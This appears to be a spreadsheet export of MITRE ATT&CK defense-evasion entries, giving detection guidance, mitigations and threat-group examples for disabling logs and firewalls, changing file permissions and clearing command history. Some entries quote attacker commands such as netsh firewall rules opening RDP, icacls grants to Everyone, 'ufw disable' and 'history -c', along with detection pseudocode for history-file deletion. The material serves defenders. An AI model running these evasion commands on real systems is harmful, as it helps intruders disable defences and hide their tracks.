Ensure proper process and file permissions are in place to prevent adversaries from disabling or interfering with logging or deleting or modifying .evtx logging files. Ensure .evtx files, which are located at &lt;code&gt;C:\Windows\system32\Winevt\Logs&lt;/code&gt;(Citation: win_xml_evt_log), have the proper file permissions for limited, legitimate access and audit policies for detection. 
Restrict Registry Permissions
Ensure proper Registry permissions are in place to prevent adversaries from disabling or interfering logging. The addition of the MiniNT registry key disables Event Viewer.(Citation: def_ev_win_event_logging)
User Account Management
Ensure proper user permissions are in place to prevent adversaries from disabling or interfering with logging.
2016 Ukraine Electric Power Attack
During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) disabled event logging on compromised systems.(Citation: Dragos Crashoverride 2018)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016), used `AUDITPOL` to prevent the collection of audit logs.(Citation: Microsoft Deep Dive Solorigate January 2021)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has executed scripts to disable the event log service.(Citation: DFIR Phosphorus November 2021)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used appcmd.exe to disable logging on a victim server.(Citation: SecureWorks BRONZE UNION June 2017)
Wevtutil
[Wevtutil](https://attack.mitre.org/software/S0645) can be used to disable specific event logs on the system.(Citation: Wevtutil Microsoft Documentation)
</t>
  </si>
  <si>
    <t xml:space="preserve">Firewall Disable
Monitor for changes in the status of the system firewall such as Windows Security Auditing events 5025 (The Windows firewall service has been stopped) and 5034 (The Windows firewall driver was stopped).
Firewall Rule Modification
Monitor cloud logs for modification or creation of new security groups or firewall rules.
Audit
Routinely check account role permissions to ensure only expected users and roles have permission to modify cloud firewalls. 
User Account Management
Ensure least privilege principles are applied to Identity and Access Management (IAM) security policies.(Citation: Expel IO Evil in AWS)
Pacu
[Pacu](https://attack.mitre.org/software/S1091) can allowlist IP addresses in AWS GuardDuty.(Citation: GitHub Pacu)
</t>
  </si>
  <si>
    <t xml:space="preserve">Cloud Service Disable
Monitor logs for API calls to disable logging. In AWS, monitor for: &lt;code&gt;StopLogging&lt;/code&gt;, &lt;code&gt;UpdateTrail&lt;/code&gt; &lt;code&gt;DeleteTrail&lt;/code&gt;.(Citation: Stopping CloudTrail from Sending Events to CloudWatch Logs) In GCP, monitor for: &lt;code&gt;google.logging.v2.ConfigServiceV2.UpdateSink&lt;/code&gt; and &lt;code&gt;google.logging.v2.ConfigServiceV2.DeleteSink&lt;/code&gt;.(Citation: Configuring Data Access audit logs) In Azure, monitor for &lt;code&gt;az monitor diagnostic-settings update&lt;/code&gt; and &lt;code&gt;az monitor diagnostic-settings delete&lt;/code&gt;.(Citation: az monitor diagnostic-settings) Additionally, a sudden loss of a log source may indicate that it has been disabled.
Cloud Service Modification
Monitor changes made to cloud services for unexpected modifications to settings and/or data 
User Account Modification
Monitor for changes to account settings associated with users/tenants that may impact defensive logging capabilities, such as the `Update User` and `Change User License` events in the Azure AD audit log.(Citation: Mandiant Defend UNC2452 White Paper)
User Account Management
Configure default account policy to enable logging. Manage policies to ensure only necessary users have permissions to make changes to logging policies.
Pacu
[Pacu](https://attack.mitre.org/software/S1091) can disable or otherwise restrict various AWS logging services, such as AWS CloudTrail and VPC flow logs.(Citation: GitHub Pacu)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Command-line invocation of the `auditctl` utility may be unusual, depending on how systems are typically used in a particular environment. At runtime, look for commands to modify or create rules using the `auditctl` utility. 
File Deletion
Monitor for missing log files from machines with known active periods.
File Modification
Monitor changes made to the `/etc/audit/audit.rules` file containing the sequence of `auditctl` commands loaded at boot time. 
OS API Execution
Monitor for abnormal execution of syslog and other functions associated with system logging.
Process Modification
Using another process or third-party tools, monitor for potentially malicious modifications or access to the `auditd` system process.
Audit
Routinely check account role permissions to ensure only expected users and roles have permission to modify logging settings.
To ensure Audit rules can not be modified at runtime, add the `auditctl -e 2` as the last command in the audit.rules files. Once started, any attempt to change the configuration in this mode will be audited and denied. The configuration can only be changed by rebooting the machine.
User Account Management
An adversary must already have root level access on the local system to make full use of this technique; be sure to restrict users and accounts to the least privileges they require.
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments associated with disabling or the modification of system firewalls such as &lt;code&gt;netsh advfirewall firewall set rule group="file and printer sharing" new enable=Yes&lt;/code&gt;,&lt;code&gt;ufw disable&lt;/code&gt;, and &lt;code&gt;ufw logging off&lt;/code&gt;.
Firewall Disable
Monitor for changes in the status of the system firewall such as Windows Security Auditing events 5025 (The Windows firewall service has been stopped) and 5034 (The Windows firewall driver was stopped).
Firewall Rule Modification
Monitor for changes made to firewall rules that might allow remote communication over protocols such as SMD and RDP. Modification of firewall rules might also consider opening local ports and services for different network profiles such as public and domain.
Windows Registry Key Modification
Monitor for changes made to windows Registry keys and/or values that adversaries might use to disable or modify System Firewall settings such as HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy.
Audit
Routinely check account role permissions to ensure only expected users and roles have permission to modify system firewalls.
Restrict File and Directory Permissions
Ensure proper process and file permissions are in place to prevent adversaries from disabling or modifying firewall settings.
Restrict Registry Permissions
Ensure proper Registry permissions are in place to prevent adversaries from disabling or modifying firewall settings.
User Account Management
Ensure proper user permissions are in place to prevent adversaries from disabling or modifying firewall settings.
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used PowerShell to add and delete rules in the Windows firewall.(Citation: FoxIT Wocao December 2019)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used `netsh` to configure firewall rules that limited certain UDP outbound packets.(Citation: Microsoft Deep Dive Solorigate January 2021)
APT38
[APT38](https://attack.mitre.org/groups/G0082) have created firewall exemptions on specific ports, including ports 443, 6443, 8443, and 9443.(Citation: CISA AA20-239A BeagleBoyz August 2020)
Carbanak
[Carbanak](https://attack.mitre.org/groups/G0008) may use [netsh](https://attack.mitre.org/software/S0108) to add local firewall rule exceptions.(Citation: Group-IB Anunak)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has disabled host-based firewalls. The group has also globally opened port 3389.(Citation: US-CERT TA18-074A)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has been observed disabling the system firewall.(Citation: Securelist Kimsuky Sept 2013)
Lazarus Group
Various [Lazarus Group](https://attack.mitre.org/groups/G0032) malware modifies the Windows firewall to allow incoming connections or disable it entirely using [netsh](https://attack.mitre.org/software/S0108). (Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Loaders)(Citation: Novetta Blockbuster Tools)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has added the following rule to a victim's Windows firewall to allow RDP traffic - `"netsh" advfirewall firewall add rule name="Terminal Server" dir=in action=allow protocol=TCP localport=3389`.(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021)
Moses Staff
[Moses Staff](https://attack.mitre.org/groups/G1009) has used batch scripts that can disable the Windows firewall on specific remote machines.(Citation: Checkpoint MosesStaff Nov 2021)
Rocke
[Rocke](https://attack.mitre.org/groups/G0106) used scripts which killed processes and added firewall rules to block traffic related to other cryptominers.(Citation: Talos Rocke August 2018)	
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has disabled &lt;code&gt;iptables&lt;/code&gt;.(Citation: Aqua TeamTNT August 2020)
BACKSPACE
The "ZR" variant of [BACKSPACE](https://attack.mitre.org/software/S0031) will check to see if known host-based firewalls are installed on the infected systems. [BACKSPACE](https://attack.mitre.org/software/S0031) will attempt to establish a C2 channel, then will examine open windows to identify a pop-up from the firewall software and will simulate a mouse-click to allow the connection to proceed.(Citation: FireEye APT30)
BADCALL
[BADCALL](https://attack.mitre.org/software/S0245) disables the Windows firewall before binding to a port.(Citation: US-CERT BADCALL)
CookieMiner
[CookieMiner](https://attack.mitre.org/software/S0492) has checked for the presence of "Little Snitch", macOS network monitoring and application firewall software, stopping and exiting if it is found.(Citation: Unit42 CookieMiner Jan 2019)
Cyclops Blink
[Cyclops Blink](https://attack.mitre.org/software/S0687) can modify the Linux iptables firewall to enable C2 communication via a stored list of port numbers.(Citation: NCSC Cyclops Blink February 2022)(Citation: Trend Micro Cyclops Blink March 2022)
DarkComet
[DarkComet](https://attack.mitre.org/software/S0334) can disable Security Center functions like the Windows Firewall.(Citation: TrendMicro DarkComet Sept 2014)(Citation: Malwarebytes DarkComet March 2018)
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) can block the Deibold Warsaw GAS Tecnologia security tool at the firewall level.(Citation: ESET Grandoreiro April 2020)
H1N1
[H1N1](https://attack.mitre.org/software/S0132) kills and disables services for Windows Firewall.(Citation: Cisco H1N1 Part 2)
HARDRAIN
[HARDRAIN](https://attack.mitre.org/software/S0246) opens the Windows Firewall to modify incoming connections.(Citation: US-CERT HARDRAIN March 2018)
HOPLIGHT
[HOPLIGHT](https://attack.mitre.org/software/S0376) has modified the firewall using [netsh](https://attack.mitre.org/software/S0108).(Citation: US-CERT HOPLIGHT Apr 2019)	
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) has a command to disable routing and the Firewall on the victim’s machine.(Citation: ESET InvisiMole June 2018)
Kasidet
[Kasidet](https://attack.mitre.org/software/S0088) has the ability to change firewall settings to allow a plug-in to be downloaded.(Citation: Zscaler Kasidet)
NanoCore
[NanoCore](https://attack.mitre.org/software/S0336) can modify the victim's firewall.(Citation: DigiTrust NanoCore Jan 2017)(Citation: PaloAlto NanoCore Feb 2016)
PyDCrypt
[PyDCrypt](https://attack.mitre.org/software/S1032) has modified firewall rules to allow incoming SMB, NetBIOS, and RPC connections using `netsh.exe` on remote machines.(Citation: Checkpoint MosesStaff Nov 2021)
Remsec
[Remsec](https://attack.mitre.org/software/S0125) can add or remove applications or ports on the Windows firewall or disable it entirely.(Citation: Kaspersky ProjectSauron Technical Analysis)
TYPEFRAME
[TYPEFRAME](https://attack.mitre.org/software/S0263) can open the Windows Firewall on the victim’s machine to allow incoming connections.(Citation: US-CERT TYPEFRAME June 2018)
ZxShell
[ZxShell](https://attack.mitre.org/software/S0412) can disable the firewall by modifying the registry key &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile&lt;/code&gt;.(Citation: Talos ZxShell Oct 2014) 
netsh
[netsh](https://attack.mitre.org/software/S0108) can be used to disable local firewall settings.(Citation: TechNet Netsh)(Citation: TechNet Netsh Firewall)
njRAT
[njRAT](https://attack.mitre.org/software/S0385) has modified the Windows firewall to allow itself to communicate through the firewall.(Citation: Fidelis njRAT June 2013)(Citation: Trend Micro njRAT 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor for commands or other activity that may be indicative of attempts to abuse older or deprecated technologies (ex: &lt;code&gt;powershell –v 2&lt;/code&gt;).
Process Creation
Monitor newly executed processes that may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls such as logging.
Process Metadata
Monitor contextual data about a running process, which may include information such as environment variables, image name, user/owner, or other information that may reveal use of a version of system features that may be outdated, vulnerable, and/or does not support updated security controls such as logging. For example, monitoring for Windows event ID (EID) 400, specifically the &lt;code&gt;EngineVersion&lt;/code&gt; field which shows the version of PowerShell running, may highlight a malicious downgrade attack.(Citation: inv_ps_attacks)
Disable or Remove Feature or Program
Consider removing previous versions of tools that are unnecessary to the environment when possible.
Software Configuration
Consider implementing policies on internal web servers, such HTTP Strict Transport Security, that enforce the use of HTTPS/network traffic encryption to prevent insecure connections.(Citation: Chromium HSTS)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.
Process Creation
Monitor script processes, such as `cscript that may be used to proxy execution of malicious files.
Script Execution
Monitor for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Execution Prevention
Certain signed scripts that can be used to execute other programs may not be necessary within a given environment. Use application control configured to block execution of these scripts if they are not required for a given system or network to prevent potential misuse by adversaries.
</t>
  </si>
  <si>
    <t xml:space="preserve">File Modification
File Modification
</t>
  </si>
  <si>
    <t xml:space="preserve">File Modification
There is no documented method for defenders to directly identify behaviors that reduce encryption key space. Detection efforts may be focused on closely related adversary behaviors, such as Modify System Image and Network Device CLI. Some detection methods require vendor support to aid in investigation.
</t>
  </si>
  <si>
    <t xml:space="preserve">Active Directory Object Modification
Monitor for changes made to DACLs and file/directory ownership. Many of the commands used to modify DACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.
Command Execution
Monitor for executed commands and arguments for PowerShell cmdlets that can be used to retrieve or modify file and directory DACLs.
File Metadata
Consider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.
Adversaries sometimes modify object access rights at the operating system level. There are varying motivations behind this action - they may not want some files/objects to be changed on systems for persistence reasons and therefore provide admin only rights; also, they may want files to be accessible with lower levels of permissions.
Windows environment logs can be noisy, so we take the following into consideration:
- We need to exclude events generated by the local system (subject security ID “NT AUTHORITY\SYSTEM”) and focus on actual user events.
- When a permission modification is made for a folder, a new event log is generated for each subfolder and file under that folder. It is advised to group logs based on handle ID or user ID.
- The Windows security log (event ID 4670) also includes information about the process that modifies the file permissions. It is advised to focus on uncommon process names, and it is also uncommon for real-users to perform this task without a GUI.
- Pseudocode Event ID is for Windows Security Log (Event ID 4670 - Permissions on an object were changed). 
- Windows Event ID 4719 (An Attempt Was Made to Access An Object) can also be used to alert on changes to Active Directory audit policy for a system.
Linux environment logs can be more noisy than the Windows-specific implementation, although Linux does not generate logs for system triggered activities like in Windows. In addition, it may be necessary to whitelist cron jobs that regularly run and execute chmod.
&lt;h4&gt; Analytic 1 : Access Permission Modification for Windows &lt;/h4&gt;
&lt;code&gt; file_dacl_events = filter log_events where (
event_id == "4670" AND
object_type == "File" AND
subject_security_id != "NT AUTHORITY\SYSTEM") &lt;/code&gt;
&lt;h4&gt;Analytic 2 - Access Permission Modification for Linux &lt;/h4&gt;
&lt;code&gt;chmod_processes = filter processes where command_line == "chmod *"&lt;/code&gt;
Process Creation
Monitor for newly constructed processes and/or command-lines that can interact with the DACLs using built-in Windows commands, such as icacls, cacls, takeown, and attrib, which can grant adversaries higher permissions on specific files and folders.
Privileged Account Management
Ensure critical system files as well as those known to be abused by adversaries have restrictive permissions and are owned by an appropriately privileged account, especially if access is not required by users nor will inhibit system functionality.
Restrict File and Directory Permissions
Applying more restrictive permissions to files and directories could prevent adversaries from modifying the access control lists.
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has used the icacls command to modify access control to backup servers, providing them with full control of all the system folders.(Citation: Sophos New Ryuk Attack October 2020)
BitPaymer
[BitPaymer](https://attack.mitre.org/software/S0570) can use &lt;code&gt;icacls /reset&lt;/code&gt; and &lt;code&gt;takeown /F&lt;/code&gt; to reset a targeted executable's permissions and then take ownership.(Citation: Crowdstrike Indrik November 2018)
BlackCat
[BlackCat](https://attack.mitre.org/software/S1068) can use Windows commands such as `fsutil behavior set SymLinkEvaluation R2L:1` to redirect file system access to a different location after gaining access into compromised networks.(Citation: Microsoft BlackCat Jun 2022)
CaddyWiper
[CaddyWiper](https://attack.mitre.org/software/S0693) can modify ACL entries to take ownership of files.(Citation: Cisco CaddyWiper March 2022)
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) can modify the binary ACL to prevent security tools from running.(Citation: ESET Grandoreiro April 2020)
JPIN
[JPIN](https://attack.mitre.org/software/S0201) can use the command-line utility cacls.exe to change file permissions.(Citation: Microsoft PLATINUM April 2016)
Ryuk
[Ryuk](https://attack.mitre.org/software/S0446) can launch &lt;code&gt;icacls &lt;path&gt; /grant Everyone:F /T /C /Q&lt;/code&gt; to delete every access-based restrictions on files and directories.(Citation: ANSSI RYUK RANSOMWARE)
WannaCry
[WannaCry](https://attack.mitre.org/software/S0366) uses &lt;code&gt;attrib +h&lt;/code&gt; and &lt;code&gt;icacls . /grant Everyone:F /T /C /Q&lt;/code&gt; to make some of its files hidden and grant all users full access controls.(Citation: LogRhythm WannaCry)
WastedLocker
[WastedLocker](https://attack.mitre.org/software/S0612) has a command to take ownership of a file and reset the ACL permissions using the &lt;code&gt;takeown.exe /F filepath&lt;/code&gt; command.(Citation: NCC Group WastedLocker June 2020) 
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Many of the commands used to modify ACLs and file/directory ownership are built-in system utilities and may generate a high false positive alert rate, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. Commonly abused command arguments include &lt;code&gt;chmod +x&lt;/code&gt;, &lt;code&gt;chmod -R 755&lt;/code&gt;, and &lt;code&gt;chmod 777&lt;/code&gt;.(Citation: 20 macOS Common Tools and Techniques)
File Metadata
Monitor and investigate attempts to modify ACLs and file/directory ownership. Consider enabling file/directory permission change auditing on folders containing key binary/configuration files.
Adversaries sometimes modify object access rights at the operating system level. There are varying motivations behind this action - they may not want some files/objects to be changed on systems for persistence reasons and therefore provide admin only rights; also, they may want files to be accessible with lower levels of permissions.
Windows environment logs can be noisy, so we take the following into consideration:
- We need to exclude events generated by the local system (subject security ID “NT AUTHORITY\SYSTEM”) and focus on actual user events.
- When a permission modification is made for a folder, a new event log is generated for each subfolder and file under that folder. It is advised to group logs based on handle ID or user ID.
- The Windows security log (event ID 4670) also includes information about the process that modifies the file permissions. It is advised to focus on uncommon process names, and it is also uncommon for real-users to perform this task without a GUI.
- Pseudocode Event ID is for Windows Security Log (Event ID 4670 - Permissions on an object were changed). 
- Windows Event ID 4719 (An Attempt Was Made to Access An Object) can also be used to alert on changes to Active Directory audit policy for a system.
Linux environment logs can be more noisy than the Windows-specific implementation, although Linux does not generate logs for system triggered activities like in Windows. In addition, it may be necessary to whitelist cron jobs that regularly run and execute chmod.
&lt;h4&gt; Analytic 1 : Access Permission Modification for Windows &lt;/h4&gt;
&lt;code&gt; file_dacl_events = filter log_events where (
event_id == "4670" AND
object_type == "File" AND
subject_security_id != "NT AUTHORITY\SYSTEM") &lt;/code&gt;
&lt;h4&gt;Analytic 2 - Access Permission Modification for Linux &lt;/h4&gt;
&lt;code&gt;chmod_processes = filter processes where command_line == "chmod *"&lt;/code&gt;
Process Creation
Monitor for newly executed processes that may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018)
Privileged Account Management
Ensure critical system files as well as those known to be abused by adversaries have restrictive permissions and are owned by an appropriately privileged account, especially if access is not required by users nor will inhibit system functionality.
Restrict File and Directory Permissions
Applying more restrictive permissions to files and directories could prevent adversaries from modifying the access control lists.
APT32
[APT32](https://attack.mitre.org/groups/G0050)'s macOS backdoor changes the permission of the file it wants to execute to 755.(Citation: ESET OceanLotus macOS April 2019)
Rocke
[Rocke](https://attack.mitre.org/groups/G0106) has changed file permissions of files so they could not be modified.(Citation: Anomali Rocke March 2019)	
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has modified the permissions on binaries with &lt;code&gt;chattr&lt;/code&gt;.(Citation: Trend Micro TeamTNT)(Citation: Cisco Talos Intelligence Group)
Black Basta
The [Black Basta](https://attack.mitre.org/software/S1070) binary can use `chmod` to gain full permissions to targeted files.(Citation: Uptycs Black Basta ESXi June 2022)
Bundlore
[Bundlore](https://attack.mitre.org/software/S0482) changes the permissions of a payload using the command &lt;code&gt;chmod -R 755&lt;/code&gt;.(Citation: 20 macOS Common Tools and Techniques)
Dok
[Dok](https://attack.mitre.org/software/S0281) gives all users execute permissions for the application using the command &lt;code&gt;chmod +x /Users/Shared/AppStore.app&lt;/code&gt;.(Citation: CheckPoint Dok)
Kinsing
[Kinsing](https://attack.mitre.org/software/S0599) has used chmod to modify permissions on key files for use.(Citation: Aqua Kinsing April 2020)
OSX/Shlayer
[OSX/Shlayer](https://attack.mitre.org/software/S0402) can use the &lt;code&gt;chmod&lt;/code&gt; utility to set a file as executable, such as &lt;code&gt;chmod 777&lt;/code&gt; or &lt;code&gt;chmod +x&lt;/code&gt;.(Citation: 20 macOS Common Tools and Techniques)(Citation: Carbon Black Shlayer Feb 2019)(Citation: Shlayer jamf gatekeeper bypass 2021)
OSX_OCEANLOTUS.D
[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) has changed permissions of a second-stage payload to an executable via &lt;code&gt;chmod&lt;/code&gt;.(Citation: sentinelone apt32 macOS backdoor 2020)
P.A.S. Webshell
[P.A.S. Webshell](https://attack.mitre.org/software/S0598) has the ability to modify file permissions.(Citation: ANSSI Sandworm January 2021)
Penquin
[Penquin](https://attack.mitre.org/software/S0587) can add the executable flag to a downloaded file.(Citation: Leonardo Turla Penquin May 2020)
XCSSET
[XCSSET](https://attack.mitre.org/software/S0658) uses the &lt;code&gt;chmod +x&lt;/code&gt; command to grant executable permissions to the malicious file.(Citation: 20 macOS Common Tools and Techniques)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.
Process Creation
Monitor script processes, such as `cscript that may be used to proxy execution of malicious files.
Script Execution
Monitor for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Behavior Prevention on Endpoint
On Windows 10, update Windows Defender Application Control policies to include rules that block the older, vulnerable versions of PubPrn.(Citation: Microsoft_rec_block_rules)
Execution Prevention
Certain signed scripts that can be used to execute other programs may not be necessary within a given environment. Use application control configured to block execution of these scripts if they are not required for a given system or network to prevent potential misuse by adversaries.
APT32
[APT32](https://attack.mitre.org/groups/G0050) has used PubPrn.vbs within execution scripts to execute malware, possibly bypassing defenses.(Citation: Twitter ItsReallyNick Status Update APT32 PubPrn)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor logs for abnormal modifications to application settings, such as the creation of malicious Exchange transport rules.
Command Execution
Monitor executed commands and arguments that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.
File Deletion
Monitor for a file that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.
File Metadata
Monitor for contextual file data that may show signs of deletion or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.
File Modification
Monitor for changes made to a file may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.
Firewall Rule Modification
Monitor for changes made to firewall rules, especially unexpected modifications that may potentially be related to allowing and/or cleaning up previous tampering that enabled malicious network traffic.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OS API Execution
Monitor for API calls that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.
Process Creation
Monitor for newly executed processes that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.
Scheduled Job Modification
Monitor for changes made to scheduled jobs that may attempt to remove artifacts on a host system.
User Account Authentication
Monitor for an attempt by a user to gain access to a network or computing resource, often by providing credentials that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.
User Account Deletion
Monitor for unexpected deletions of user accounts. Windows event logs may highlight activity associated with an adversary's attempt to remove an account (e.g., `Event ID 4726 - A user account was deleted`).
Alerting on these Event IDs may generate a high degree of false positives, so compare against baseline knowledge for how systems are typically used and correlate account modification events with other indications of malicious activity where possible.
Windows Registry Key Deletion
Monitor windows registry keys that may be deleted or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.
Windows Registry Key Modification
Monitor for changes made to windows registry keys or values that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.
Encrypt Sensitive Information
Obfuscate/encrypt event files locally and in transit to avoid giving feedback to an adversary.
Remote Data Storage
Automatically forward events to a log server or data repository to prevent conditions in which the adversary can locate and manipulate data on the local system. When possible, minimize time delay on event reporting to avoid prolonged storage on the local system. 
Restrict File and Directory Permissions
Protect generated event files that are stored locally with proper permissions and authentication and limit opportunities for adversaries to increase privileges by preventing Privilege Escalation opportunities.
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) temporarily replaced legitimate utilities with their own, executed their payload, and then restored the original file.(Citation: FireEye SUNBURST Backdoor December 2020)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has restored malicious [KernelCallbackTable](https://attack.mitre.org/techniques/T1574/013) code to its original state after the process execution flow has been hijacked.(Citation: Lazarus APT January 2022)
Bankshot
[Bankshot](https://attack.mitre.org/software/S0239) deletes all artifacts associated with the malware from the infected machine.(Citation: US-CERT Bankshot Dec 2017)
BlackEnergy
[BlackEnergy](https://attack.mitre.org/software/S0089) has removed the watermark associated with enabling the &lt;code&gt;TESTSIGNING&lt;/code&gt; boot configuration option by removing the relevant strings in the &lt;code&gt;user32.dll.mui&lt;/code&gt; of the system.(Citation: F-Secure BlackEnergy 2014)
CSPY Downloader
[CSPY Downloader](https://attack.mitre.org/software/S0527) has the ability to remove values it writes to the Registry.(Citation: Cybereason Kimsuky November 2020)
DarkWatchman
[DarkWatchman](https://attack.mitre.org/software/S0673) can uninstall malicious components from the Registry, stop processes, and clear the browser history.(Citation: Prevailion DarkWatchman 2021)
Donut
[Donut](https://attack.mitre.org/software/S0695) can erase file references to payloads in-memory after being reflectively loaded and executed.(Citation: Donut Github)
EVILNUM
[EVILNUM](https://attack.mitre.org/software/S0568) has a function called "DeleteLeftovers" to remove certain artifacts of the attack.(Citation: Prevailion EvilNum May 2020)
Flagpro
[Flagpro](https://attack.mitre.org/software/S0696) can close specific Windows Security and Internet Explorer dialog boxes to mask external connections.(Citation: NTT Security Flagpro new December 2021)
FunnyDream
[FunnyDream](https://attack.mitre.org/software/S1044) has the ability to clean traces of malware deployment.(Citation: Bitdefender FunnyDream Campaign November 2020)
HermeticWiper
[HermeticWiper](https://attack.mitre.org/software/S0697) can disable pop-up information about folders and desktop items and delete Registry keys to hide malicious services.(Citation: Crowdstrike DriveSlayer February 2022)(Citation: ESET Hermetic Wizard March 2022)
Maze
[Maze](https://attack.mitre.org/software/S0449) has used the “Wow64RevertWow64FsRedirection” function following attempts to delete the shadow volumes, in order to leave the system in the same state as it was prior to redirection.(Citation: McAfee Maze March 2020)	
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) has a command to delete a Registry key it uses, &lt;code&gt;\Software\Microsoft\Internet Explorer\notes&lt;/code&gt;.(Citation: FireEye Metamorfo Apr 2018)
Neoichor
[Neoichor](https://attack.mitre.org/software/S0691) can clear the browser history on a compromised host by changing the `ClearBrowsingHistoryOnExit` value to 1 in the `HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Privacy` Registry key.(Citation: Microsoft NICKEL December 2021)
Orz
[Orz](https://attack.mitre.org/software/S0229) can overwrite Registry settings to reduce its visibility on the victim.(Citation: Proofpoint Leviathan Oct 2017)
Rising Sun
[Rising Sun](https://attack.mitre.org/software/S0448) can clear a memory blog in the process by overwriting it with junk bytes.(Citation: McAfee Sharpshooter December 2018)	
SDBbot
[SDBbot](https://attack.mitre.org/software/S0461) has the ability to clean up and remove data structures from a compromised host.(Citation: Proofpoint TA505 October 2019)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) can remove artifacts from the compromised host, including created Registry keys.(Citation: GitHub SILENTTRINITY Modules July 2019)
SUNBURST
[SUNBURST](https://attack.mitre.org/software/S0559) removed HTTP proxy registry values to clean up traces of execution.(Citation: Microsoft Deep Dive Solorigate January 2021)
Sardonic
[Sardonic](https://attack.mitre.org/software/S1085) has the ability to delete created WMI objects to evade detections.(Citation: Bitdefender Sardonic Aug 2021)
ShadowPad
[ShadowPad](https://attack.mitre.org/software/S0596) has deleted arbitrary Registry values.(Citation: Kaspersky ShadowPad Aug 2017)
Sibot
[Sibot](https://attack.mitre.org/software/S0589) will delete an associated registry key if a certain server response is received.(Citation: MSTIC NOBELIUM Mar 2021)
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) can delete OLE Automation and SQL stored procedures used to store malicious payloads.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments for actions that could be taken to clear command history, such as &lt;code&gt;Clear-History&lt;/code&gt; on Windows or `clear logging` / `clear history` via a Network Device CLI in AAA logs, or to disable writing command history, such as &lt;code&gt;history -c&lt;/code&gt; in bash/zsh .
&lt;h4&gt;Analytic 1 : Clear Powershell Console Command History &lt;/h4&gt;
&lt;code&gt; suspicious_commands = filter ProcessId, ProcessFilePath, command_line where
  (event_id == "1" OR event_id == "4688") 
  AND
  (command_line LIKE '%rm (Get-PSReadlineOption).HistorySavePath%' OR
   command_line LIKE '%del (Get-PSReadlineOption).HistorySavePath%' OR 
   command_line LIKE '%Set-PSReadlineOption –HistorySaveStyle SaveNothing%’ OR
   command_line LIKE '%Remove-Item (Get-PSReadlineOption).HistorySavePath%' OR
   (command_line LIKE '%del%' AND 
    command_line LIKE '%Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt%'))&lt;/code&gt;
&lt;h4&gt; Analytic 2 : Powershell Commands &lt;/h4&gt;
&lt;code&gt; suspicious_commands = filter CommandName, CommandType where 
  event_id == "4103" AND
  (CommandName LIKE '%Clear-History%' OR
   (CommandName LIKE '%Remove-Item%' AND CommandParameterValue LIKE '%ConsoleHost_history.text%')) &lt;/code&gt;
File Deletion
Monitor for unexpected deletion of a command history file, such as ConsoleHost_history.txt, ~/.zsh_history, or ~/.bash_history.
&lt;h4&gt; Analytic 1 : Deletion of command history files&lt;/h4&gt;
&lt;code&gt; suspicious_files = filter ProcessGuid, ProcessFilePath, UserName, FilePath where
  (event_id == "23" AND
